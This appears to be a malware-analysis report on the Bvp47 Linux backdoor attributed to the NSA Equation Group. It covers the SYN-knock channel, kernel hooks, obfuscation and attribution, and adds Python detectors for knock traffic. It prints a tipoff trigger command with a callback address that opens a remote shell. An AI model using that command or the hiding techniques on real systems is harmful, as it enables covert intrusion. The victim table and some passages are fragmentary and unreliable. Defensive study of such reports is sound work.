# Bvp47: Top-tier Backdoor of US NSA Equation Group

Technical Details

## Table of Contents

1. Executive Summary
2. Unseen Backdoor
3. Backdoor Overview – Bvp47
   - File Structure (File Properties, File Structure)
   - Usage Scenario
4. Attacker Correlation and Attribution
   - "The Shadow Brokers Leaks" Incident Correlation
   - Asymmetric Algorithm Private Key Match
   - Samples In-depth Correlation
   - Full Control Command Line
   - Connection with Snowden Incident
   - Bvp47 – US NSA's Top-tier Backdoor
5. Global Victims
   - Connection with Snowden Incident
   - Exploit the victim host as a jump server to attack target
6. Detailed Techniques of Bvp47 Backdoor
   - Major Behaviours
   - Payload
   - Strings Encryption
   - Techniques of Function Name Obfuscation
   - Bvp Engine
   - System Hook
   - AV Evasion in Kernel Module
   - BPF Covert Channel
   - Channel Encryption and Decryption
   - Runtime Environment Detection
   - Other Techniques
7. Summary
8. References

## 1. Executive Summary

In a certain month of 2013, during an in-depth forensic investigation of a host in a key domestic department, researchers from the Pangu Lab extracted a set of advanced backdoors for the Linux platform, which used an advanced covert channel based on TCP SYN packets, code obfuscation, system hiding, and a self-destruction design. When full decryption failed, it was further found that this backdoor needs a check code bound to the host in order to run normally. The researchers then cracked the check code and successfully ran the backdoor. Judging from some of its behavioural functions, this is a top-tier APT backdoor, but further investigation required the attacker's asymmetric-encryption private key to activate the remote control function. Based on the most common string "Bvp" in the sample and the numerical value 0x47 used in the encryption algorithm, the team named the corresponding malicious code "Bvp47" at the time.
In 2016 and 2017, "The Shadow Brokers" published two batches of hacking files claimed to be used by "The Equation Group". In these hacking files, researchers from Pangu Lab found the private key that can be used to remotely trigger the backdoor Bvp47. Therefore, it can be concluded that Bvp47 is a hacking tool belonging to "The Equation Group". Through further research, the researchers found that the multiple programs and attack operation manuals disclosed by "The Shadow Brokers" are completely consistent with the unique identifier used in the NSA network attack platform operation manual [References 3 and 4] exposed by CIA analyst Snowden in the "Prism" incident in 2013. In view of the US government's prosecution of Snowden on three charges of "spreading national defense information without permission and deliberately spreading confidential information", it can be determined that the documents published by "The Shadow Brokers" are indeed NSA documents, which fully proves that "The Equation Group" belongs to the NSA, that is, Bvp47 is a top-tier backdoor of the NSA.

In addition, the files of "The Shadow Brokers" revealed that the scope of victims exceeded 287 targets in 45 countries, including Russia, Japan, Spain, Germany, Italy, etc. The attack lasted for over 10 years. Moreover, one victim in Japan was used as a jump server for further attacks.

Pangu Lab uses the code name "Operation Telescreen" for several Bvp47 incidents. The telescreen is a device imagined by the British writer George Orwell in his novel "1984". It can be used to remotely monitor the person or organization deploying it, and the "thought police" can arbitrarily monitor the information and behaviour at any telescreen.

The Equation Group is the world's leading cyber-attack group and is generally believed to be affiliated with the National Security Agency of the United States. Judging from the attack tools related to the organization, including Bvp47, the Equation Group is indeed a first-class hacking group. The tools are well designed, powerful, and widely adapted. Its network attack capability, equipped with 0-day vulnerabilities, was unstoppable, and its data acquisition under covert control took little effort. The Equation Group is in a dominant position in national-level cyberspace confrontation.

## 2. Unseen Backdoor

In a certain month of 2015, an advanced threat detection system deployed by a customer raised a special network intrusion alarm: there were suspicious communication activities between important servers. During the incident response process, packets were captured at several nodes in the network and the servers' information was obtained by disk mirroring. After preliminary analysis, at least two servers in the network had been hacked and implanted with backdoors, and there were signs of a relatively large amount of data leakage.

The investigation of the incident involved three servers: one was the source of the external attacks, host A, and the other two were internally affected servers, V1 (a mail server) and V2 (a business server).

There was abnormal communication between the external host A and the V1 server. Specifically, A first sent a SYN packet with a 264-byte payload to port 80 of the V1 server (normal SYN packets generally do not carry a payload), and then the V1 server immediately initiated an external connection to a high port of machine A and maintained a large amount of data exchange. The data communication was encrypted.

At almost the same time, the V1 server connected to the V2 server's SMB service and performed some sensitive operations, including logging in to the V2 server with an administrator account, trying to open terminal services, enumerating directories, and executing PowerShell scripts through scheduled tasks. At the same time, the V2 server connected to port 8081 of the V1 server to download suspicious files, including the PowerShell script and the encrypted data of the second stage.
A simple HTTP server implemented in Python was started on port 8081 of the V1 server, and the V2 server obtained two files from it: index.html and index.htm. Among them, index.html is a Base64-encoded PowerShell script. After this script is executed on the server, it continues to download a file named index.htm from the V1 server. Its content is Base64-encoded data, but after decoding it is found to be an unreadable string. Analysis of the PowerShell script that downloads index.htm proves that this is a piece of asymmetrically encrypted data. Next, the V2 server connects to a high port of the V1 server to communicate with its own protocol, and the large amount of interactive transmission data is encrypted.

Based on the above observations, it can be inferred that the V1/V2 servers have been implanted with backdoors. By integrating the overall interaction of machine A and the V1/V2 servers, we can restore the communication process between the machines as follows:

1. Machine A connects to port 80 of the V1 server to send a knock request and start the backdoor program on the V1 server;
2. The V1 server reverse-connects to a high port of machine A to establish a data pipeline;
3. The V2 server connects to the backdoor web service opened on the V1 server and obtains a PowerShell script for execution from the V1 server;
4. The V1 server connects to the SMB service port of the V2 server to perform command operations;
5. The V2 server establishes a connection with the V1 server on a high port and uses its own encryption protocol for data exchange;
6. The V1 server synchronizes the data interaction with machine A, acting as a data relay between machine A and the V2 server.

This is a backdoor communication technique that had never been seen before, implying an organization with strong technical capabilities behind it.

## 3. Backdoor Overview – Bvp47

After some effort, our forensic team successfully extracted the backdoor file from the compromised machine and found that the string "Bvp" is common in the sample file and that the value 0x47 is used in the encryption algorithm. We temporarily named the sample "Bvp47".

### File Structure

File Properties

|Filename|initserial or others|
|---|---|
|Hash (MD5)|58b6696496450f254b1423ea018716dc|
|File Size|299,148 bytes|
|File Path|/usr/bin/modload|
|Platform|Linux|
|File Structure|ELF|

The basic file structure of Bvp47 includes two parts: loader and payload. The loader is mainly responsible for the decryption and in-memory loading of the payload. The payload is compressed and encrypted. Its 18 slices are simply divided into three types T0, T1, T2, named Slice0x00-Slice0x11:

- T0{Slice0x00}
- T1{Slice0x01-Slice0x10}
- T2{Slice0x11}

After decompression and analysis, the sizes of the 18 slices of Bvp47 are as follows:

[Figure in the original report: sizes of the 18 slices]

The 18 slices are sorted according to the number of Bvp engine API calls used by each slice (for an introduction to the Bvp engine, see the following chapters) and the number of export functions. The details are as follows (the red part in the original table marks the modules that need to be focused on):

[Table in the original report, with columns Slice, Main Feature, Bvp API Call, Export Function and Comments for Slice0x00 to Slice0x11. Recoverable from the extracted text: Slice0x00 detects the runtime environment; the other identified features are "Non-PE module, Bvp offset database" (two slices), Dewdrops, SectionChar_Agent, PATh=. and crond; the comments name an init function and three module_main entry points. Bvp API call counts in slice order 0x00 to 0x11: 0, 192, 8, 9, 2, 3, 10, 10, 3, 8, 0, 0, 0, 15, 0, 17, 0, 190. Export function counts as extracted: 490, 5, 14, 3, 16, 152, 264, 17, 3, 14, 0, 0, 0, 0, 94, 0, 1.]

### Usage Scenario

Our team reproduced the use of the Bvp47 backdoor in our own environment and roughly clarified its usage scenarios and basic communication mechanisms.
As an important backdoor platform for the long-term control of victims after a successful intrusion, Bvp47 generally lives on a Linux system in the demilitarized zone that communicates with the Internet. It mainly plays the role of the core control bridge in the overall attack, as shown in the following figure:

[Figure in the original report: Attacker (SYN knock) -> Internet (e.g. port 443) -> Gateway, Router/Firewall -> DMZ host running Bvp47 (email server etc.) -> TCP lateral movement to internal servers]

After analysis, the actual network attack packet flow was restored:

1. The control end (192.168.91.131) sends a TCP SYN packet carrying a specific payload of a certain length (136 bytes) to port 1357 of the "victim IP" (192.168.91.128); a port that is already live can be reused directly;
2. After receiving the special SYN packet, the "victim IP" (192.168.91.128) immediately follows the instructions and connects to port 2468 of the "control end";
3. The "victim IP" (192.168.91.128) enters the controlled process.

Bvp47 exploits the weakness that common network detection devices generally do not inspect the data of packets during the TCP handshake: it injects data into the first SYN packet in order to avoid detection by network security devices.

[Step 1] The payload data in the mentioned SYN packet is as follows (hex dump in the original report).

[Step 3] The content of the packet sent by the victim IP after the successful TCP handshake is as follows (hex dump in the original report).

As the analysis later in this article shows, Bvp47 builds its covert communication system from cryptography, networking, and the Linux OS. Such a covert communication system is cutting edge and can be seen as an advanced version of "SYNKnock" (old versions of Cisco devices only conduct simple verification).
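The SYN-knock and reverse-connection pattern described in Section 2 and in the packet flow above can be detected on the wire precisely because a handshake-opening SYN should carry no data. The following Python is an added example, not code from the Pangu Lab report: a minimal IPv4/TCP parser that flags payload-carrying SYN packets and pairs each one with a subsequent connection from the knocked host back to the knock source on a high port. The packet bytes, timestamps and the 30-second correlation window are constructed for illustration; the addresses and ports are the ones from the reproduction above.

```python
"""Detect Bvp47-style SYN-knock traffic in IPv4/TCP packets (added example,
not code from the Pangu Lab report). A bare SYN normally carries no data, so a
SYN with a payload, followed by the knocked host opening a connection back to
the knock source on a high port, is the wire-level signature described above.
All packets below are constructed test input, not captured traffic."""
import struct
from dataclasses import dataclass

TCP_SYN = 0x02
TCP_ACK = 0x10

# tcpdump/libpcap filter equivalent to is_knock(): SYN set, ACK clear, and
# IP total length minus IP header minus TCP header is non-zero.
KNOCK_BPF = ("tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn and "
             "(ip[2:2] - ((ip[0]&0xf)<<2) - ((tcp[12]&0xf0)>>2)) != 0")


@dataclass
class Packet:
    ts: float          # capture timestamp in seconds (constructed here)
    src: str
    dst: str
    sport: int
    dport: int
    flags: int
    payload_len: int


def parse_ipv4_tcp(ts, raw):
    """Parse an IPv4 packet carrying TCP; return None for anything else."""
    if len(raw) < 20 or raw[0] >> 4 != 4 or raw[9] != 6:
        return None
    ihl = (raw[0] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[2:4])[0]
    if len(raw) < ihl + 20:
        return None
    src = ".".join(str(b) for b in raw[12:16])
    dst = ".".join(str(b) for b in raw[16:20])
    tcp = raw[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    flags = tcp[13]
    payload_len = max(total_len - ihl - data_off, 0)
    return Packet(ts, src, dst, sport, dport, flags, payload_len)


def is_bare_syn(pkt):
    """SYN set and ACK clear: the first packet of a TCP handshake."""
    return bool(pkt.flags & TCP_SYN) and not (pkt.flags & TCP_ACK)


def is_knock(pkt):
    """A handshake-opening SYN that carries data is the knock signature."""
    return is_bare_syn(pkt) and pkt.payload_len > 0


def find_knock_callbacks(packets, window=30.0, high_port=1024):
    """Pair each knock with the first later SYN from the knocked host back to
    the knock source on a high port within `window` seconds (assumed value)."""
    findings = []
    for k in (p for p in packets if is_knock(p)):
        for p in packets:
            if (k.ts < p.ts <= k.ts + window and is_bare_syn(p)
                    and p.src == k.dst and p.dst == k.src
                    and p.dport >= high_port):
                findings.append((k, p))
                break
    return findings


def build_ipv4_tcp(src, dst, sport, dport, flags, payload=b""):
    """Construct a minimal IPv4/TCP packet (checksums left zero) for testing."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags,
                      65535, 0, 0) + payload
    total = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, 6, 0,
                     bytes(int(x) for x in src.split(".")),
                     bytes(int(x) for x in dst.split(".")))
    return ip + tcp


def analyse_sample():
    """Run the detector over a constructed capture mirroring the reproduced
    flow: 136-byte SYN knock to 192.168.91.128:1357, callback to port 2468."""
    ctl, victim, other = "192.168.91.131", "192.168.91.128", "192.168.91.10"
    frames = [
        (100.0, build_ipv4_tcp(ctl, victim, 40000, 1357, TCP_SYN, b"\x00" * 136)),
        (100.1, build_ipv4_tcp(other, victim, 40001, 80, TCP_SYN)),             # normal SYN
        (100.2, build_ipv4_tcp(victim, ctl, 51000, 2468, TCP_SYN)),             # callback
        (100.3, build_ipv4_tcp(ctl, victim, 2468, 51000, TCP_SYN | TCP_ACK)),   # SYN-ACK
    ]
    packets = [p for p in (parse_ipv4_tcp(ts, raw) for ts, raw in frames) if p]
    return find_knock_callbacks(packets)


if __name__ == "__main__":
    for knock, callback in analyse_sample():
        print(f"knock {knock.src}->{knock.dst}:{knock.dport} "
              f"({knock.payload_len} B payload), "
              f"callback {callback.src}->{callback.dst}:{callback.dport}")
```

The `KNOCK_BPF` string is the tcpdump equivalent of the first stage only; the callback correlation needs flow state and is what `find_knock_callbacks` adds.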
## 4. Attacker Correlation and Attribution

### "The Shadow Brokers Leaks" Incident Correlation

In 2016, a hacker group named Shadow Brokers released two compressed files, eqgrp-free-file.tar.xz.gpg and eqgrp-auction-file.tar.xz.gpg, claiming to have compromised the United States NSA's Equation Group. The compressed files contain a large number of the Equation Group's hacking tools. Among them, the eqgrp-free-file.tar.xz.gpg file was made available for public download and inspection, while the decompression password of the eqgrp-auction-file.tar.xz.gpg file was offered for sale at a price of 1 million bitcoins. Nobody bought it, and Shadow Brokers finally chose to publish the decompression password of eqgrp-auction-file.tar.xz.gpg in April 2017.

In the process of analyzing the eqgrp-auction-file.tar.xz.gpg file, it was found that Bvp47 and the attack tools in the compressed package were technically linked in a definitive way, mainly through the "dewdrops", "solutionchar_agents", "tipoffs", "StoicSurgeon", "insision" and other directories. The "dewdrops_tipoffs" directory contains the private key required by Bvp47 for its RSA public/private key communication. On this basis, it can be confirmed that Bvp47 comes from the Equation Group. Among them, "dewdrops" and "solutionchar_agents" are integrated into the Bvp47 sample platform as component functions, and the "tipoffs" directory is the control end of the Bvp47 remote communication.

### Asymmetric Algorithm Private Key Match

The "tipoffs" directory contains the RSA asymmetric-algorithm private key used in the Bvp47 covert channel. That RSA private key is vital to Bvp47's command execution and other operations.

### Samples In-depth Correlation

The user.tool.stoicsurgeon.COMMON file in the \Linux\doc\old\etc\ directory of eqgrp-auction-file.tar.xz.gpg describes how to use the tipoff-BIN tool and also reveals a series of information:

1. Bvp47 contains the module named "dewdrop", which can be triggered by the RSA private key of the module "tipoff";
2. The COMMON file describes a backdoor named "StoicSurgeon", a multi-platform advanced rootkit backdoor, which can be used in combination with "dewdrop";
3. "StoicSurgeon" also has a little brother, "Incision", which is also a rootkit backdoor;
4. During an intrusion, "Incision" can be upgraded to "StoicSurgeon".

The operating systems supported by dewdrop basically cover the mainstream Linux distributions, JunOS, FreeBSD, Solaris, etc. The operating systems supported by StoicSurgeon likewise basically cover the mainstream Linux distributions, JunOS, FreeBSD, Solaris, etc.

How to upgrade from Incision to StoicSurgeon is described in the file "user.tool.linux.remove_install_ss.COMMON".

### Full Control Command Line

The callback (reverse) connection of the Bvp47 backdoor can be triggered with the following command:

```
./tipoffs/dewdrop_tipoff --trigger-address 11.22.33.44 --target-address 12.34.56.78 --target-protocol tcp --target-port 1357 --callback-address 13.24.57.68 --callback-port 2468 --start-ish
```

Here ish corresponds to the file ish in the \eqgrp-auction-file\Linux\bin directory. Combined with the leaked ish tool, the command successfully activated the Bvp47 backdoor, completed the remote download-and-execute function, and opened a remote shell.

### Connection with Snowden Incident

In December 2013, the German media outlet "Der Spiegel" published an NSA ANT catalog with 50 pictures. This is a series of top-secret materials compiled by the NSA in 2008-2009, including the usage of a series of advanced hacking tools. The source of the information may have been Edward Snowden or another unknown intelligence provider [Reference 3].
The FOXACID-Server-SOP-Redacted.pdf file in the NSA ANT catalog [Reference 4], that is, the "Acid Fox" project server standard operating procedure (revision), is the functional description and user manual of the NSA vulnerability attack operating platform. The document describes the mandatory unique identification code required for the job, "ace02468bdf13579".

The file SecondDate-3021.exe in the \eqgrp-free-file\Firewall\BANANAGLEE\BG3000\Install\LP\Modules\PIX\ directory also carries the unique identification code "ace02468bdf13579", and the file name "SecondDate" conforms to the standard of the operation document. Even if SecondDate-3021.exe alone were a coincidence, the string "ace02468bdf13579" appears in 47 files related to the tool named SecondDate in the leaked tool set, which is obviously not a coincidence that can be explained away. A SecondDate file in the \eqgrp-free-file\Firewall\SCRIPTS\ directory describes how to use SecondDate, which is consistent with the description in FOXACID-Server-SOP-Redacted.pdf mentioned earlier.

The SecondDate tool set spans multiple platforms and architectures, such as Windows, Linux, Solaris, etc. Its types, from executable files to shellcode, are very comprehensive, and it has undergone multiple iterations: the lowest version, 1.3.0.1, was created in May 2007, and the highest version, 3.0.3.6, was created in October 2013. The starting time is in line with the top-secret electronic monitoring plan implemented in 2007 as described by the PRISM project, and it lasted as long as 6 years. The iterated versions, complete cross-platform support, support for various architectures, and diversified startup methods imply the strong organizational and technical capabilities behind the project.
Moreover, the relationship between STOICSURGEON and the SECONDDATE program is also clarified in opscript.txt in the "EquationGroup-master\Linux\etc" directory.

Therefore, there are enough reasons to believe that the two compressed files leaked by Shadow Brokers in 2016 and 2017 contained the hacking tools of the NSA's Equation Group.

### Bvp47 – US NSA's Top-tier Backdoor

1. The unique feature identifier "ace02468bdf13579" in the hacking tool mentioned in the NSA ANT catalog material FOXACID-Server-SOP-Redacted.pdf has appeared many times in the tool set of "The Shadow Brokers Leaks";
2. The RSA private key used by the Bvp47 backdoor program exists in the tool tipoff-BIN of "The Shadow Brokers Leaks";
3. The tool tipoff-BIN of "The Shadow Brokers Leaks" can directly activate the module Dewdrops of the backdoor Bvp47, and Dewdrop and STOICSURGEON belong to the same series of backdoors;
4. It is finally determined that the Bvp47 backdoor is assembled from the tool modules of "The Shadow Brokers Leaks", that is, Bvp47 is a top-tier backdoor of the Equation Group of the US NSA.

## 5. Global Victims

### The victims in the 2017 Shadow Brokers leak

A list of potential Dewdrop, StoicSurgeon and Incision backdoor victims is provided in the \Linux\bin\varkeys\pitchimpair\ directory of the eqgrp-auction-file.tar.xz.gpg file.
The victims are all over the world, including some key units of China (the full table of domain names, IP addresses, countries and organizations is in the original report).
Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Chiao Tung University of Hsinchu City, Taiwan Province National Taiwan University of Science and Technology, Taipei, Taiwan Province Taiwan Province TANet Taiwan Province TANet Taiwan Fixed Network, Taiwan Province Chunghwa Telecom, Taiwan Province Hualien County Tzu Chi University of Science and Technology, Taiwan Province Taiwan Province Taiwan Province Taiwan Province| |---|---|---|---| ----- ----- ###### Exploit the victim host as a jump server to attack target There was a network traffic evidence indicated that attacker would exploit the victim host as a jump server or C2 to attack target, namely, 210.135.90.0/24 in Japan played a C2 server in 2015. ----- ##### 6. Detailed Techniques of Bvp47 Backdoor The implementation of Bvp47 includes complex code, segment encryption and decryption, Linux multi-version platform adaptation, rich rootkit anti-tracking techniques, and most importantly, it integrates advanced BPF engine used in advanced covert channels, as well as cumbersome communication encryption and decryption process. This chapter will analyze the above aspects. ###### Main Behaviors There are several key points in the program initialization as follows: 1. Linux user mode and kernel mode. The process in user mode will remain alive 2. Initialize the Bvp engine 3. A series of environmental tests. If environmental information do not meet requirements, sample will be automatically deleted. 4. A series of payload block decryption 5. Tamper with kernel devmem restrictions. This will allow process in user mode to directly read and write kernel space. And other kernel techniques are used as well. 6. Load non-standard lkm module files 7. 
Hook system function in order to hide its own process, file, network, and self-deleting detection in the covered channel communication as follows: a . After Bvp47 receives the SYN packet sent by the server, it will match the packet format in BPF filter rules (see below) b . Only after satisfying the BPF rules in operation 1, encryption algorithms such as RSA+RC-X will be decrypted; c . Perform corresponding command operations according to the decrypted instructions; ----- ###### Payload The entire file of Bvp47 adopts the commonly used backdoor packaging method, that is, the backdoor function modules are compressed and assembled and then placed at the end of the file, and the whole file exists in the form of additional data. The additional data is loaded through the loader function module built into the program, which mainly completes the following steps: ###### Read Check Unzip Decryption Load The main data structure of payload is as follows: The specific content corresponding to the sample is as follows: ----- ----- 1. Call four different decryption functions (the underlying decryption method is the same) to complete the decompression operation of each slice; 2. After completing operation 1, the loader will continue to call the Xor 0x47 algorithm (see other chapters) to complete the decryption of slice. The specific decryption functions are as follows: ----- ###### Strings Encryption In the Bvp47 sample, many strings and blocks are encrypted to lower the possibility of exposure. These encryption techniques are mainly based on XOR operation. These subtle encryptions will cause considerable analysis costs to the researchers. According to the analysis, there are mainly 8 kinds of XOR operations: The algorithm of 0xa8a16d65_xor is as follows: ----- ###### Techniques of Function Name Obfuscation The export functions of some code slice modules in Bvp47's payload generally use the form of "digital names" to provide interface services to external. 
Such confusion creates a big obstacle for researchers in analyzing the function analysis of the export interface: ----- ###### Bvp Engine To improve its versatility, Bvp47 uses many dynamic calculations of Linux kernel data and function addresses. At the same time, to be fundamentally compatible with a large amount of Linux kernel data and various independently developed sections of the payload, they developed the Bvp engine to dynamically redirect and adapt the system functions and data structures required by Bvp47 in compilation and runtime. The Bvp engine adapts many functions and data structures: ----- ----- ----- Parsed result of the Bvp engine format in 0x0b: The MD5 value calculation method in the above figure is to read the content of /proc/version, and directly calculate the MD5 value as the unique identifier of the operating system kernel. Different versions of the kernel will correspond to the corresponding MD5 and structure values. To verify the accuracy of the MD5 value, a series of kernel versions are collected as follows: ----- ----- values marked with the digital version number in the upper half of the figure can be found in Bvp47, and they are all affected system versions): ###### System Hook Bvp47 mainly hooks nearly 70 process functions in the Linux operating system kernel, which are mainly used to hide network, process, file, and SeLinux bypass, etc. 
More details are as follows:

| Hooked Function | Hook Location | Hook Technique |
|---|---|---|
| devmem_is_allowed | Middle of Function | inline hook |
| page_is_ram | Middle of Function | inline hook |
| sys_swapon | Start of Function | inline hook |
| si_swapinfo | Start of Function | inline hook |
| do_fork | Middle of Function | inline hook |
| release_task | Start of Function | inline hook |
| dev_ioctl | Start of Function | inline hook |
| d_alloc | Start of Function | inline hook |
| vfs_readdir | Start of Function | inline hook |
| sys_unlink | Middle of Function | inline hook |
| sys_rmdir | Middle of Function | inline hook |
| vfs_getattr | Start of Function | inline hook |
| vfs_getattr64 | Start of Function | inline hook |
| tcp4_seq_show | Start of Function | inline hook |
| listening_get_next | Start of Function | inline hook |
| established_get_next | Start of Function | inline hook |
| udp4_seq_show | Start of Function | inline hook |
| raw_seq_show | Start of Function | inline hook |
| packet_seq_show | Start of Function | inline hook |
| unix_seq_show | Start of Function | inline hook |
| Selinux_xxx_ | Start of Function | inline hook |
| get_raw_sock | Start of Function | inline hook |
| get_raw_sock | Start of Function | inline hook |
| sock_init_data | Start of Function | inline hook |
| tcp_time_wait | Middle of Function | inline hook |
| unix_accept | Start of Function | inline hook |
| read_mem | Start of Function | inline hook |
| __inode_dir_notify | Start of Function | inline hook |
| avc_has_perm | Middle of Function | inline hook |
| do_mount | Start of Function | inline hook |
| sys_umount | Start of Function | inline hook |
| do_acct_process | Start of Function | inline hook |
| proc_root_lookup | Start of Function | inline hook |
| proc_pid_readdir | Start of Function | inline hook |
| kill_something_info | Middle of Function | inline hook |
| sys_kill | Start of Function | inline hook |
| sys_rt_sigqueueinfo | Start of Function | inline hook |
| sys_tkill | Start of Function | inline hook |
| sys_tgkill | Start of Function | inline hook |
| sys_getpriority | Start of Function | inline hook |
| sys_setpriority | Start of Function | inline hook |
| sys_getpgid | Start of Function | inline hook |
| sys_getsid | Start of Function | inline hook |
| sys_capget | Start of Function | inline hook |
| setscheduler | Start of Function | inline hook |
| sys_sched_getscheduler | Middle of Function | inline hook |
| sys_sched_getparam | Middle of Function | inline hook |
| sched_getaffinity | Middle of Function | inline hook |
| sched_setaffinity | Middle of Function | inline hook |
| sys_sched_rr_get_interval | Middle of Function | inline hook |
| sys_ptrace | Start of Function | inline hook |
| sys_wait4 | Start of Function | inline hook |
| sys_waitid | Start of Function | inline hook |
| do_execve | Start of Function | inline hook |
| sys_close | Start of Function | inline hook |
| sys_open | Start of Function | inline hook |
| sys_read | Start of Function | inline hook |
| sys_write | Start of Function | inline hook |
| sys_dup | Start of Function | inline hook |
| sys_dup2 | Start of Function | inline hook |
| sys_accept | Start of Function | inline hook |
| sys_bind | Start of Function | inline hook |
| sys_connect | Start of Function | inline hook |
| sys_sendto | Middle of Function | inline hook |
| sys_sendmsg | Middle of Function | inline hook |
| sys_recvfrom | Middle of Function | inline hook |
| sys_recvmsg | Middle of Function | inline hook |

Example 1: Comparison of the hook of the __d_lookup function:

... hooking procedure also verifies whether an upper-layer application accesses the file /usr/bin/modload. The first part of the handler function is as follows:

In the handler function, many dynamic function-lookup techniques are used:

After hooking devmem_is_allowed, Bvp47 can read and write kernel space from user mode.

By inline-hooking avc_has_perm internally, Bvp47 can bypass SELinux for any operation without restriction.

Bvp47 filters read operations in sys_read.

###### AV Evasion in Kernel Module

Bvp47 modifies the first four bytes of the kernel module's ELF file to evade in-memory searches for ELF images, and loads the module through its own LKM loader.

###### BPF Covert Channel

BPF (Berkeley Packet Filter) is a kernel engine used in the Linux kernel to filter packets of custom formats.
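Because the trigger described in this chapter is a TCP SYN that carries data, something a normal three-way handshake never does, a network-side check is the natural detection. The following Python detector is an added example written for this article, not Pangu Lab's code and not derived from the sample: it parses raw IPv4/TCP packets, flags pure SYNs (SYN set, ACK clear) that have a payload, and adds the two trigger indicators the report gives for the channel, a 0x88-byte packet and a length field stored as 0x0088 XOR 0xE6CF. The packet builder, the addresses, and searching the payload anywhere for the encoded length value (the report does not give its offset) are assumptions.

```python
import struct
from dataclasses import dataclass, field
from typing import List, Optional

# Values taken from the report: trigger is a TCP SYN, the trigger packet is
# 0x88 bytes, and its length field is stored as 0x0088 XOR 0xE6CF.
IP_PROTO_TCP = 6
TCP_FLAG_SYN = 0x02
TCP_FLAG_ACK = 0x10
TCP_FLAG_PSH = 0x08
TRIGGER_PAYLOAD_LEN = 0x88
ENCODED_LEN_MARKER = struct.pack("!H", 0x0088 ^ 0xE6CF)  # b"\xe6\x47"


@dataclass
class Finding:
    src: str
    dst: str
    dport: int
    payload_len: int
    reasons: List[str] = field(default_factory=list)


def _ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def parse_ipv4_tcp(pkt: bytes):
    """Minimal IPv4/TCP parser: returns (src, dst, flags, dport, payload),
    or None when the buffer is not an IPv4/TCP packet."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    if pkt[9] != IP_PROTO_TCP:
        return None
    tcp = pkt[ihl:min(total_len, len(pkt))]
    if len(tcp) < 20:
        return None
    _sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    flags = off_flags & 0x01FF
    return _ip(pkt[12:16]), _ip(pkt[16:20]), flags, dport, tcp[data_off:]


def inspect_packet(pkt: bytes) -> Optional[Finding]:
    """Flag a pure SYN that carries data, then add the report's trigger
    indicators when they are present."""
    parsed = parse_ipv4_tcp(pkt)
    if parsed is None:
        return None
    src, dst, flags, dport, payload = parsed
    if not (flags & TCP_FLAG_SYN) or flags & TCP_FLAG_ACK or not payload:
        return None
    hit = Finding(src, dst, dport, len(payload), ["pure SYN carries payload"])
    if len(payload) == TRIGGER_PAYLOAD_LEN:
        hit.reasons.append("payload length is 0x88 (trigger packet size)")
    # Assumption: the report gives the encoded length value but not its
    # offset, so the marker is searched anywhere in the payload.
    if ENCODED_LEN_MARKER in payload:
        hit.reasons.append("encoded length field 0x0088^0xE6CF present")
    return hit


def scan(packets) -> List[Finding]:
    return [f for f in map(inspect_packet, packets) if f is not None]


def build_ipv4_tcp(src, dst, sport, dport, flags, payload=b"") -> bytes:
    """Constructed test packets only: checksums are left zero."""
    tcp_hdr = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 65535, 0, 0)
    total = 20 + len(tcp_hdr) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, IP_PROTO_TCP, 0,
                         bytes(int(x) for x in src.split(".")),
                         bytes(int(x) for x in dst.split(".")))
    return ip_hdr + tcp_hdr + payload


# Constructed sample traffic; the addresses are documentation placeholders.
SAMPLE_TRIGGER = build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40001, 443, TCP_FLAG_SYN,
                                ENCODED_LEN_MARKER + bytes(TRIGGER_PAYLOAD_LEN - 2))
SAMPLE_PACKETS = [
    build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 22, TCP_FLAG_SYN),               # plain SYN
    build_ipv4_tcp("198.51.100.5", "192.0.2.10", 22, 40000, TCP_FLAG_SYN | TCP_FLAG_ACK),  # SYN/ACK
    build_ipv4_tcp("192.0.2.10", "198.51.100.5", 40000, 22, TCP_FLAG_ACK | TCP_FLAG_PSH, b"data"),
    SAMPLE_TRIGGER,
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_PACKETS):
        print(f"{hit.src} -> {hit.dst}:{hit.dport} len={hit.payload_len:#x}: " + "; ".join(hit.reasons))
```

TCP Fast Open (RFC 7413) legitimately places data in a SYN, so on networks where it is enabled the first reason alone should be treated as a low-severity signal and the size and length-field indicators should carry the weight. The report also mentions UDP trigger packets, which this example does not cover.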
It provides a prescribed filter language that lets an ordinary user-space process select specified packets. Bvp47 uses this BPF feature directly as an advanced kernel-level technique in its covert channel, so that it does not need direct hooks on the kernel network stack that researchers could detect. The specific BPF usage is as follows. Only SYN packets (including UDP packets) that match the rules are passed to the next step for encryption and decryption:

... packet is 0x88 bytes. The structure of the Trigger Package field is shown in the figure:

Field structure diagram:

The red part: the data length, 0x0088 XOR 0xE6CF;
The green part: the actual length of the decrypted data;
The dark blue part: the purple Random field XOR 0x9D6A.

###### Channel Encryption and Decryption

Bvp47 uses the asymmetric algorithm RSA together with the RC-X algorithm to secure the communication link. Intermediate calculations involve factors such as the time and length of the sent and received packets. Some of the key pairs are as follows:

###### Runtime Environment Detection

To protect itself, Bvp47 performs a series of operating-environment tests to prevent security researchers from directly running dynamic analysis once the sample is obtained. After decrypting the first block of the payload, a 32-bit unsigned integer value is obtained. This value is used as a checksum to verify the operating environment. The verification method is as follows:

1. The loader executes statvfs("/", &stats);
2. Get the blocks and files values from the result of step 1;
3. Compare blocks ^ files == checksum. If they are equal, the current environment is judged to meet the requirements for running.

###### Other Techniques

